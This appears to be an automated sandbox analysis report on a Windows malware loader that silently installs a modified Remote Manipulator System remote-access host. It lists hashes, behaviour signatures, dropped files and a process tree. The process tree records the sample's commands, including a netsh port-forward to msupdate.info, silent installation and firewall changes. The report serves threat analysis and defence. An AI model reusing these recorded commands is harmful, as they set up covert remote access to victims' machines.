Resubmissions

29-12-2021 11:50

211229-nz3vsaddbl 8

29-12-2021 11:29

211229-nlssnaddak 10

28-12-2021 17:00

211228-vh1sescfan 10

Analysis

  • max time kernel
    98s
  • max time network
    100s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    29-12-2021 11:29

General

  • Target

    tmp/fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe

  • Size

    397KB

  • MD5

    aff57ee1a4f3731c2036046910f78fb4

  • SHA1

    ef9627c0cadff85a3dfaab6aef0b7c885f03b186

  • SHA256

    3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4

  • SHA512

    5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 8 IoCs
  • Sets file execution options in registry 2 TTPs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 3 IoCs
  • Modifies powershell logging option 1 TTPs
  • Drops file in Program Files directory 53 IoCs
  • Drops file in Windows directory 20 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Gathers network information 2 TTPs 6 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe"
    1⤵
    • Modifies WinLogon
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:856
    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8f94smgx.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:656
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD450.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD440.tmp"
        3⤵
          PID:1252
      • C:\Windows\system32\chcp.com
        "C:\Windows\system32\chcp.com" 437
        2⤵
          PID:1372
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" interface portproxy show all
          2⤵
            PID:792
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:656
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:1380
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:1620
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" interface portproxy reset
            2⤵
              PID:1592
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" interface portproxy show all
              2⤵
                PID:1624
              • C:\Windows\system32\netsh.exe
                "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
                2⤵
                  PID:1780
                • C:\Windows\system32\netsh.exe
                  "C:\Windows\system32\netsh.exe" interface portproxy show all
                  2⤵
                    PID:1300
                  • C:\Windows\system32\netsh.exe
                    "C:\Windows\system32\netsh.exe" interface portproxy show all
                    2⤵
                      PID:1904
                    • C:\Windows\system32\NETSTAT.EXE
                      "C:\Windows\system32\NETSTAT.EXE" -na
                      2⤵
                      • Gathers network information
                      • Suspicious use of AdjustPrivilegeToken
                      PID:892
                    • C:\Windows\system32\NETSTAT.EXE
                      "C:\Windows\system32\NETSTAT.EXE" -na
                      2⤵
                      • Gathers network information
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1528
                    • C:\Windows\system32\NETSTAT.EXE
                      "C:\Windows\system32\NETSTAT.EXE" -na
                      2⤵
                      • Gathers network information
                      • Suspicious use of AdjustPrivilegeToken
                      PID:560
                    • C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe
                      "C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe"
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1000
                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
                        3⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:1572
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
                          4⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:544
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Users\Admin\AppData\Local\Temp\killself.bat
                          4⤵
                            PID:1500
                    • C:\Windows\system32\msiexec.exe
                      C:\Windows\system32\msiexec.exe /V
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1968
                    • C:\Windows\system32\msiexec.exe
                      C:\Windows\system32\msiexec.exe /V
                      1⤵
                      • Blocklisted process makes network request
                      • Enumerates connected drives
                      • Drops file in Program Files directory
                      • Drops file in Windows directory
                      • Modifies data under HKEY_USERS
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1496
                      • C:\Windows\syswow64\MsiExec.exe
                        C:\Windows\syswow64\MsiExec.exe -Embedding A73C8E42006320536EDD5E741232C0A3
                        2⤵
                        • Loads dropped DLL
                        PID:788
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:2020
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:1820
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:1584
                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                      "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"
                      1⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:868
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:1044
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
                        2⤵
                        • Executes dropped EXE
                        PID:1852

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Program Files (x86)\Remote Manipulator System - Host\English.lg

                      MD5

                      bc25377ade68750b834c81fa71c233b8

                      SHA1

                      84dbb465dd2125f47668e2508e18af9bd6db2fd8

                      SHA256

                      9a48a7ea7ba2c2f33280d1e1722ebbc59bf81bc6c5a1f97edca53ea641ffd8e3

                      SHA512

                      205ab195339d7108adbe6dfabd48e4e21c5956ded587d7213a44618f0d34a43f7b8abaa7765b9d31695efacfc44beeb69fbaa3cb27c141b6a653713fdf5ebce5

                    • C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll

                      MD5

                      2ddfa39f5c2fd3f00681ef2970617e4b

                      SHA1

                      8152aa18afbacf398b92168995ec8696d3fe3659

                      SHA256

                      f938bdc741ef1d2738b532aef001a160e3a3627ed8a27158b7017ee49fc65791

                      SHA512

                      f89f0f02cda650c138e4ebaef198f0762dfd571ef7d46a6b3710cd93d76bc52a79055c55afca46128a9a84a795a5cb946ca93c492e07cfb503c9b27d96211e20

                    • C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll

                      MD5

                      3d0b27b3f8aa22575aa0faf0b2d67216

                      SHA1

                      39fc787538849692ed7352418616f467b7a86a1d

                      SHA256

                      d7782488ef29bf0fd7e8faf0bd24414a6540bf7366434692a5a485d5ae2d7d44

                      SHA512

                      19f0785d3cecce0dbbb7da1be640bffebe4daedc65a513d1db0b5e533eb96aaa0588831de74c88e5013c00405e03ca4188c4b633e39e6c49ab5c1d1b42191ca8

                    • C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg

                      MD5

                      e44e34bc285b709f08f967325d9c8be1

                      SHA1

                      e73f05c6a980ec9d006930c5343955f89579b409

                      SHA256

                      1d99a7b5f7b3daa61fa773972b1e335aa09b92411484f6ddc99d2b2894455a5b

                      SHA512

                      576b292b6e9cf022822443e050994462a6cbd9a3c60063bae9f54c78a84e75e17bb5eddf7e259a22a9d93f757cb6536c503762e2a30e75091e40c2756cde8727

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll

                      MD5

                      292a1748850d1fdc91d4ec23b02d6902

                      SHA1

                      8f15f1c24e11c0b45b19c82a78f7b79b1e7f932d

                      SHA256

                      acf354ad6ed94e876b29a60c5870dd91e7b3f76cc82c1a862c92024a12404a9f

                      SHA512

                      cf7579f1169ec21d9bf3c666d416d3fe2a4f9953d4d328b182452e40043f91055d301fd4b4a21454b847dbdb0af6a61c52657caded7d6fd7e88812aceeacf704

                    • C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll

                      MD5

                      4570f7a40357016c97afe0dd4faf749b

                      SHA1

                      ebc8a1660f1103c655559caab3a70ec23ca187f1

                      SHA256

                      a5f008bf852d4c73e001f840d6f8b233c7d9bc9570cee639d40c1c8723bf99f8

                      SHA512

                      6b16979d004adc04259f2ce043cde6f7b57f2ddf5f4cea7bb390fd6b9fb273d22355b837f1b5c2eae77ea7df792de8e6db43e31d7246f044935a8187dace493b

                    • C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll

                      MD5

                      038bf9f3a58560ad1130eeb85cdc1a87

                      SHA1

                      3571eb7293a2a3a5bf6eb21e1569cd151d995d1a

                      SHA256

                      d247afa3bd1ccc18e11eb099280802a61d3792a2018c476d95debf2091e9707d

                      SHA512

                      8ffa52b358841600b9122974079d22d4e11bc4214316cd85ac4d4af0e369112b6827029f74a9a9d3918db00c7fed3a9a1985e0b43da39783a748d78752ae2385

                    • C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll

                      MD5

                      eeb2c52abbc7eb1c029b7fec45a7f22e

                      SHA1

                      8bfeb412614e3db0a2bf0122f4d68cc27b8c3a61

                      SHA256

                      c0f0b84d587066af8f80f41a7be63b4c01547af3f1e011602ac1b6ee0ac54a2c

                      SHA512

                      0b5b83335c6f602b8397a3c2ae6d1e661d744eb27114463d53e344bf18774ccb38853d314ebe05536d4c28c29fe3fdaba041a6a46983789f064ca70881cfcb85

                    • C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll

                      MD5

                      e38372f576d927f525ef8e1a34b54664

                      SHA1

                      26af9d1db0a3f91d7fe13147e55f06c302d59389

                      SHA256

                      4046bd0b93909a41d0fd96f0405a864c79a47f493165546569251c1f73db6b0b

                      SHA512

                      78b7477b000407990304ec37624b873514d4ed9daa1b42fd988707b7374ffab442ba28fe19884724867f3f0f7a5f12f7fc8c228c050115c902d1569e4a3b13c7

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                      MD5

                      10898aded77a8968aac272b7b652663a

                      SHA1

                      08f974df65f15744515b315ac3e431cb4f7325a6

                      SHA256

                      573d094fb4f1d10a2673f634d7a392d5250c2bfc25dda019be9faf6d6b3916fc

                      SHA512

                      b09882a37ea89fe6224460ff6b1b91577c978e1fe7cf77f5810ae97330043021977bafc32bc230133234795bfadaccc5e699a32448fa045be47d88538ed16ae5

                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi

                      MD5

                      73e578a44265558d3ace212869d43cbb

                      SHA1

                      d2c15578def8996ed0ae4a44754055b774b095a7

                      SHA256

                      8a6945ead42d78d963d6f2e126eebb89c0e82b02c389d4badcaa837ff49bf7f4

                      SHA512

                      fe661e19899a6f749a180e5b312fcebb2963acc92720d1c6cabba22b0ffd250f1930c9dac62f789cd4b99aff86ef0f3944ae52a583e2c1be57c9fca391be9bf4

                    • C:\Users\Admin\AppData\Local\Temp\8f94smgx.dll

                      MD5

                      1236d5dae832f49db9fd6e06eb5ec121

                      SHA1

                      25293ef8270630395eb401925a50d4063fbf935a

                      SHA256

                      5d3aec4d6713dabc0494700f69c92663b4e9dd603648129479538b3993d6cf95

                      SHA512

                      bfd7336fe0ef96616252a0d44b2ab290722ad186e5e69fc249b0bde2da9bf721bc9d50537a76fdad40745de953b94979508fc07b3e33b1f649f2fa0d05c9a4d4

                    • C:\Users\Admin\AppData\Local\Temp\8f94smgx.pdb

                      MD5

                      81696225767cbd1c2dee7bae5cb23197

                      SHA1

                      590e87d8703354503b017fe7500ea2c87bb87682

                      SHA256

                      193a029d22aefffbcfedb2d1432f0ae84913bf42a0e19ddfb58af940640109d1

                      SHA512

                      f8ef37dd32bcaf81a2b4fce226bc1a9e4784ef54f997cdda28a30b487035a11f29086a69d6a73029399312ea5372bf6875830bcb263ad0a337d4fa53c30445d4

                    • C:\Users\Admin\AppData\Local\Temp\RESD450.tmp

                      MD5

                      8d2ed10084d15847c218e799b1cf9b2e

                      SHA1

                      8093555468fb6900d6aa2c7d2993e36bb52453ef

                      SHA256

                      98f714b71a8335d40b5132036c4f74e6ca29f206d8e270eb1483269dcd626273

                      SHA512

                      c0cbd4f853438f7b9e46ea21983ef486f37a1695c23b4533b31b47885e83761bfe955245f56f8824987f70e0a77ced6bbca22f578efee0b3bcf28d29354a8bce

                    • C:\Users\Admin\AppData\Local\Temp\killself.bat

                      MD5

                      c2ac85b000427a4a00f19da237aaaf86

                      SHA1

                      459ecb5e64576348e6c654724e87825772c06ea8

                      SHA256

                      b5157eceaf9b5f6448d15dcfe7011af0b44a4288f7667c5d717f042c2fba1352

                      SHA512

                      e62f711445398b0654e698c4f7d4c75bb8693e901ae99f1cf543f45ccd9532daf27bba1ceb9d180d0379a41c9a62d6ee2df30cd25b9abb05532c551a0fad814b

                    • C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe

                      MD5

                      73f351beae5c881fafe36f42cde9a47c

                      SHA1

                      dc1425cfd5569bd59f5d56432df875b59da9300b

                      SHA256

                      a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

                      SHA512

                      f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

                    • C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe

                      MD5

                      73f351beae5c881fafe36f42cde9a47c

                      SHA1

                      dc1425cfd5569bd59f5d56432df875b59da9300b

                      SHA256

                      a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

                      SHA512

                      f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

                    • C:\Windows\Installer\MSIC3A7.tmp

                      MD5

                      b0bcc622f1fff0eec99e487fa1a4ddd9

                      SHA1

                      49aa392454bd5869fa23794196aedc38e8eea6f5

                      SHA256

                      b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081

                      SHA512

                      1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

                    • \??\c:\Users\Admin\AppData\Local\Temp\8f94smgx.0.cs

                      MD5

                      1640a04633fee0dfdc7e22c4f4063bf6

                      SHA1

                      3cb525c47b5dd37f8ee45b034c9452265fba5476

                      SHA256

                      55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

                      SHA512

                      85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

                    • \??\c:\Users\Admin\AppData\Local\Temp\8f94smgx.cmdline

                      MD5

                      aef175ea9cd84e43740d5b63af215863

                      SHA1

                      149ec64dd11d9a7cce65dd1be83029c035396deb

                      SHA256

                      010c1c18b903e279a700417a3cd54c8f42773aaac150e7c7ccb5d40c80aa9e65

                      SHA512

                      b4e84d59bf8241d471cd6e6b11ea061ece3cdd4fde4c712ca524ab52df8bdb57112eb8fa4e434ae8f7852d155a1c5c3cddcbc99fabfb8cc4332cf6d5df19b368

                    • \??\c:\Users\Admin\AppData\Local\Temp\CSCD440.tmp

                      MD5

                      f25b020fbf23ad85819b842afa6a4b7f

                      SHA1

                      1553bedc146849ecdd21c85d82326c8b21f21618

                      SHA256

                      42c6dede64525b15c73518ef67b800266f60bc1c9118e7e5e419258477aacc2d

                      SHA512

                      c08a19ecf1d412b20e914e62a0efa17eff458a0b46081e017caee2033a0bc571c85d8dc0b8c665796237dbba0ddaede63ec24f2e43106911aed0cd52d4bf0d7d

                    • \Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • \Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • \Windows\Installer\MSIC3A7.tmp

                      MD5

                      b0bcc622f1fff0eec99e487fa1a4ddd9

                      SHA1

                      49aa392454bd5869fa23794196aedc38e8eea6f5

                      SHA256

                      b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081

                      SHA512

                      1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

                    • memory/544-98-0x0000000000000000-mapping.dmp

                    • memory/560-85-0x0000000000000000-mapping.dmp

                    • memory/656-60-0x00000000022C0000-0x00000000022C2000-memory.dmp

                      Filesize

                      8KB

                    • memory/656-57-0x0000000000000000-mapping.dmp

                    • memory/656-70-0x0000000000000000-mapping.dmp

                    • memory/788-103-0x0000000000000000-mapping.dmp

                    • memory/792-68-0x0000000000000000-mapping.dmp

                    • memory/856-54-0x000007FEF2CE0000-0x000007FEF3D76000-memory.dmp

                      Filesize

                      16.6MB

                    • memory/856-56-0x000007FEF1FF0000-0x000007FEF2B4D000-memory.dmp

                      Filesize

                      11.4MB

                    • memory/856-86-0x00000000005ED000-0x00000000005EF000-memory.dmp

                      Filesize

                      8KB

                    • memory/856-87-0x000000001AD20000-0x000000001AD39000-memory.dmp

                      Filesize

                      100KB

                    • memory/856-55-0x00000000005C0000-0x00000000005C2000-memory.dmp

                      Filesize

                      8KB

                    • memory/868-134-0x0000000000230000-0x0000000000231000-memory.dmp

                      Filesize

                      4KB

                    • memory/892-83-0x0000000000000000-mapping.dmp

                    • memory/1000-88-0x0000000000000000-mapping.dmp

                    • memory/1000-90-0x0000000075891000-0x0000000075893000-memory.dmp

                      Filesize

                      8KB

                    • memory/1044-137-0x0000000000000000-mapping.dmp

                    • memory/1252-61-0x0000000000000000-mapping.dmp

                    • memory/1300-79-0x0000000000000000-mapping.dmp

                    • memory/1372-66-0x0000000000000000-mapping.dmp

                    • memory/1380-71-0x0000000000000000-mapping.dmp

                    • memory/1500-121-0x0000000000000000-mapping.dmp

                    • memory/1528-84-0x0000000000000000-mapping.dmp

                    • memory/1572-93-0x0000000000000000-mapping.dmp

                    • memory/1572-100-0x00000000001D0000-0x00000000001D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1584-133-0x0000000000230000-0x0000000000231000-memory.dmp

                      Filesize

                      4KB

                    • memory/1584-116-0x0000000000000000-mapping.dmp

                    • memory/1592-73-0x0000000000000000-mapping.dmp

                    • memory/1620-72-0x0000000000000000-mapping.dmp

                    • memory/1624-75-0x0000000000000000-mapping.dmp

                    • memory/1780-77-0x0000000000000000-mapping.dmp

                    • memory/1820-111-0x0000000000000000-mapping.dmp

                    • memory/1820-115-0x0000000000230000-0x0000000000231000-memory.dmp

                      Filesize

                      4KB

                    • memory/1852-138-0x0000000000000000-mapping.dmp

                    • memory/1852-143-0x00000000001C0000-0x00000000001C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1904-81-0x0000000000000000-mapping.dmp

                    • memory/1968-67-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp

                      Filesize

                      8KB

                    • memory/2020-114-0x00000000001D0000-0x00000000001D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2020-107-0x0000000000000000-mapping.dmp